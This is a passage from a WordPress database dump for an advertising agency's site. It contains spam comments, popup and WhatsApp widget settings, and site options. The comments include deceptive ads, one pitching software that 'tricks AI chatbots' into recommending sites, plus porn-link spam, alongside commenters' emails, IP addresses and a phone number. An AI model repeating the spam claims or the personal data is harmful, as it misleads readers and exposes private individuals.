6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(75,1,'Extended Opportunity','62540@gmail.com','','185.125.50.5','2024-03-11 09:47:30','2024-03-11 09:47:30','BIG NEWS: there’s a brand new software being launched today that legally tricks AI chatbots into recommending YOUR website.\r\n\r\nGo check it out here ==>> https://ext-opp.com/ProfitSGE\r\n\r\nThat’s right: Just imagine…there’s 1.5 billion people using AI chatbots every day.\r\nWhat if every time someone…\r\n\r\n-> Searched for “best laptops for my needs”… the AI would show them your website?\r\n-> Asked ChatGPT for “best doctors in my city”… it would send them to your local client’s business?\r\n-> Begged Google Gemini for “FAST weight loss”… you guessed it, Gemini would FORCE them to visit your site, display your affiliate offer and fill your pockets full of sales!\r\n\r\nThis is a TRAFFIC & SEO revolution unlike anything that’s ever come before.\r\n\r\n\r\nThis is YOUR chance to legally “hijack” traffic from 1.5 billion AI chatbots users and funnel it straight to any offer, site, product – for yourself or your clients!\r\n\r\nGet your copy here ==>> https://ext-opp.com/ProfitSGE',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(76,1,'Extended Opportunity','66918@gmail.com','','185.125.50.5','2024-03-14 18:03:45','2024-03-14 18:03:45','A.I Create & Sell Unlimited Audiobooks to 2.3 Million Users - https://ext-opp.com/ECCO',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(77,1,'Extended Opportunity','16204@gmail.com','','185.125.50.5','2024-03-18 15:15:26','2024-03-18 15:15:26','A.I Create & Sell Unlimited Audiobooks to 2.3 Million Users - https://ext-opp.com/ECCO',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(78,1,'Kelsey Brown','snideneville@yahoo.com','https://poutsphenom.com','178.159.37.56','2024-03-19 05:00:49','2024-03-19 05:00:49','Hey there would you mind letting me know which webhost you\'re working with?\r\nI\'ve loaded your blog in 3 different internet browsers and I must say this blog loads a lot faster then most.\r\n\r\nCan you suggest a good web hosting provider at a reasonable price?\r\nCheers, I appreciate it!',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 OPR/85.0.4341.60','comment',0,0),(79,1,'Extended Opportunity','6597@gmail.com','','185.125.50.5','2024-03-22 01:51:32','2024-03-22 01:51:32','Create Stunning Ebooks In 60 Seconds  - https://ext-opp.com/AIEbookPal',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(80,1,'Extended Opportunity','16364@gmail.com','','185.125.50.5','2024-03-22 01:51:49','2024-03-22 01:51:49','Create Stunning Ebooks In 60 Seconds  - https://ext-opp.com/AIEbookPal',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(81,1,'Extended Opportunity','91107@gmail.com','','185.125.50.5','2024-03-22 01:52:05','2024-03-22 01:52:05','Create Stunning Ebooks In 60 Seconds  - https://ext-opp.com/AIEbookPal',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(82,1,'Extended Opportunity','32540@gmail.com','','185.125.50.5','2024-03-22 01:52:20','2024-03-22 01:52:20','Create Stunning Ebooks In 60 Seconds  - https://ext-opp.com/AIEbookPal',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(83,1,'Extended Opportunity','39682@gmail.com','','185.125.50.5','2024-03-26 20:40:18','2024-03-26 20:40:18','Elevate Learning Adventures with The Story Shack!\r\n\r\nA library of 200+ high-quality books tailored to the school curriculum.\r\nStoryShack\'s Build a Book bundle features word searches, quizzes, creative coloring pages, high-quality images, and top SEO keywords.\r\nStoryShack\'s StoryCraft Pro bundle includes the \"Melody Minds Library\" with 350+ music tracks and \"AnimateMasters Pro,\" offering 30+ categories of animations.\r\nAnd as if that\'s not enough, here are the MEGA BONUSES:\r\n\r\n✔ 100+ Mega Mazes Pack\r\n✔ 100+ Sudoku Elements Pack\r\n✔ 100+ Comic Book Template Pack\r\n✔ 100+ Handwriting Practice Template Pack\r\n✔ 100+ Kids Story Book Templates\r\n✔ Canva Book Templates\r\n✔ Additional beautiful content like journal prompts\r\n✔ INCLUDED: The Ultimate Workbook\r\n\r\nClick https://ext-opp.com/StoryShack to explore The Story Shack e-Learning Collection and seize the opportunity for multiplied income!',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0),(84,1,'goodhere Big cock porn','2kIij2r4EN@hotmail.com','https://goodhere.org/','179.43.191.18','2024-03-28 03:24:22','2024-03-28 03:24:22','goodhere Threesome porn vurucutewet.pDNletsvjRh',0,'0','TheWebContents','comment',0,0),(85,1,'Extended Opportunity','48685@gmail.com','','185.125.50.5','2024-04-02 19:40:14','2024-04-02 19:40:14','Millions of Free Traffic with AI Tools - https://ext-opp.com/AIVault',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_elfsight_popup_widgets`
--

DROP TABLE IF EXISTS `wp_elfsight_popup_widgets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_elfsight_popup_widgets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `time_created` varchar(10) NOT NULL,
  `time_updated` varchar(10) NOT NULL,
  `active` int(1) NOT NULL DEFAULT 1,
  `options` longtext CHARACTER SET utf8mb4 NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_elfsight_popup_widgets`
--

LOCK TABLES `wp_elfsight_popup_widgets` WRITE;
/*!40000 ALTER TABLE `wp_elfsight_popup_widgets` DISABLE KEYS */;
INSERT INTO `wp_elfsight_popup_widgets` VALUES (1,'Test','1596834674','1596834677',1,'{\"blocks\":[{\"id\":\"babc7e96-e195-4da3-a8c5-7072d42f2f5c\",\"type\":\"image\",\"imageFile\":{\"type\":\"uploaded\",\"data\":{\"name\":\"bitmap.png\",\"size\":2807,\"type\":\"image/png\",\"url\":\"https://files.elfsight.com/storage/4bc9e068-6999-4781-ad0c-ab83bceba5ea/84590d74-76f1-4519-8a17-553116fd9de7.png\",\"extension\":\"png\",\"file_url\":\"https://files.elfsight.com/storage/4bc9e068-6999-4781-ad0c-ab83bceba5ea/84590d74-76f1-4519-8a17-553116fd9de7.png\",\"width\":150,\"height\":140},\"imageScale\":56,\"label\":\"Image\"},\"imageScale\":100},{\"id\":\"a05499d3-30f2-415a-a184-5cb56bf31ff4\",\"type\":\"spacing\",\"spacingSize\":16,\"label\":\"Spacing\"},{\"id\":\"4adbfd26-2dce-474b-974b-dbe26c5fa8a5\",\"type\":\"title\",\"titleText\":\"Christmas Sale!\",\"titleColor\":\"rgb(0, 0, 0)\",\"titleFontSize\":28,\"titleFontWeight\":700,\"label\":\"Title\"},{\"id\":\"a737ec46-7364-4473-b349-499987a3926b\",\"type\":\"title\",\"titleText\":\"-50% FOR ALL\",\"titleColor\":\"rgb(0, 0, 0)\",\"titleFontSize\":50,\"titleFontWeight\":700,\"label\":\"Title\"},{\"id\":\"c91ed901-99f2-4cf1-9cdd-32986a89a948\",\"type\":\"text\",\"textText\":\"Your coupon code:<br>\",\"textColor\":\"rgb(0, 0, 0)\",\"textFontSize\":20,\"label\":\"Text\"},{\"id\":\"0fb99ac1-e9e3-43ba-afff-2ad34bb79c6f\",\"type\":\"coupon\",\"couponCode\":\"GET50\",\"couponColor\":\"rgb(0, 0, 0)\",\"couponFontSize\":16,\"label\":\"Coupon\"},{\"id\":\"6689e0da-ab1d-42a0-ac83-457ff13f91dd\",\"type\":\"button\",\"buttonText\":\"START SHOPPING\",\"buttonAction\":\"closePopup\",\"buttonStyle\":\"filled\",\"buttonShape\":\"rectangle\",\"buttonColor\":\"rgb(255, 38, 67)\",\"buttonFontSize\":16,\"label\":\"Button\"}],\"layout\":\"modal\",\"width\":500,\"popupBlocksAlignment\":\"center\",\"popupShape\":\"rectangle\",\"popupBackgroundColor\":\"rgb(255, 255, 255)\",\"popupBackgroundImage\":null,\"popupBackgroundImageOverlayColor\":\"\",\"overlayVisible\":true,\"overlayClose\":true,\"overlayBackgroundColor\":\"rgba(17, 17, 17, 0.7)\",\"overlayBackgroundImage\":null,\"overlayBackgroundImageOverlayColor\":\"\",\"closeButtonVisible\":true,\"closeButtonColor\":\"rgba(17, 17, 17, 0.7)\",\"undefined\":null,\"triggerPageLoadEnabled\":true,\"triggerTimeOnPageEnabled\":false,\"triggerTimeOnPageDuration\":30,\"triggerScrollEnabled\":false,\"triggerScrollPosition\":50,\"triggerScrollToElementEnabled\":false,\"triggerScrollToElementId\":null,\"triggerClickEnabled\":false,\"triggerClickElementId\":null,\"triggerExitIntentEnabled\":false,\"displayFrequency\":\"everytime\",\"displayPages\":\"allPages\",\"displayExcludedPages\":[],\"displaySpecificPages\":[],\"displayDevices\":[\"desktop\",\"mobile\",\"tablet\"],\"deactivate\":false,\"showElfsightLogo\":false}');
/*!40000 ALTER TABLE `wp_elfsight_popup_widgets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_elfsight_whatsapp_chat_widgets`
--

DROP TABLE IF EXISTS `wp_elfsight_whatsapp_chat_widgets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_elfsight_whatsapp_chat_widgets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `time_created` varchar(10) NOT NULL,
  `time_updated` varchar(10) NOT NULL,
  `active` int(1) NOT NULL DEFAULT 1,
  `options` longtext CHARACTER SET utf8mb4 NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_elfsight_whatsapp_chat_widgets`
--

LOCK TABLES `wp_elfsight_whatsapp_chat_widgets` WRITE;
/*!40000 ALTER TABLE `wp_elfsight_whatsapp_chat_widgets` DISABLE KEYS */;
INSERT INTO `wp_elfsight_whatsapp_chat_widgets` VALUES (1,'whatthehell.co','1595970199','1597743924',1,'{\"phone\":\"+919315666436\",\"undefined\":null,\"bubbleIcon\":\"whatsapp-chat\",\"bubbleText\":\"\",\"picture\":\"custom\",\"pictureLibrary\":{\"photo\":\"https://pbs.twimg.com/profile_images/951055655594545153/F6eybr-i.jpg\"},\"pictureCustom\":\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Bitmap.png\",\"name\":\"Dhiraj Kumar\",\"nameCaptionType\":\"replyTime\",\"nameCaptionReplyTime\":\"Typically replies in minutes\",\"nameCaptionCustom\":\"\",\"welcomeMessage\":\"Hi there ?<br><br>How can I help you?\",\"buttonText\":\"Start Chat\",\"buttonIconVisible\":true,\"position\":\"floating\",\"align\":\"right\",\"whereToDisplayChat\":\"allPages\",\"excludedPages\":[],\"specificPages\":[],\"devicesToDisplay\":[\"mobile\",\"desktop\"],\"showChatTo\":\"allVisitors\",\"displayDays\":[0,1,2,3,4,5,6],\"timeSchedule\":false,\"displayStartTime\":\"00:00\",\"displayEndTime\":\"00:00\",\"timeOnPage\":0,\"timeOnSite\":0,\"scrollPosition\":0,\"exiIntent\":true,\"notifications\":[\"bubbleBadge\",\"tabTitle\"],\"headerBackgroundColor\":\"rgb(9, 94, 84)\",\"buttonColor\":\"rgb(79, 206, 93)\",\"bubbleBackgroundColor\":\"rgb(255, 255, 255)\",\"bubbleIconColor\":\"rgb(79, 206, 93)\",\"buttonBorderRadius\":18,\"deactivate\":false,\"showElfsightLogo\":false}');
/*!40000 ALTER TABLE `wp_elfsight_whatsapp_chat_widgets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=239718 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://wthtest1.in8.cdn-alpha.com','yes'),(2,'home','https://wthtest1.in8.cdn-alpha.com','yes'),(3,'blogname','WhatTheHell? | Creative, Advertising, Digital Marketing Agency','yes'),(4,'blogdescription','Pioneer Advertising Agency','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','dhiraj@wthtest1.in8.cdn-alpha.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(29,'rewrite_rules','a:94:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=134&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','https://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:2:{i:0;s:69:\"/storage/v11800/wthtest1/public_html/wp-content/themes/Divi/style.css\";i:1;s:0:\"\";}','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','56657','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a: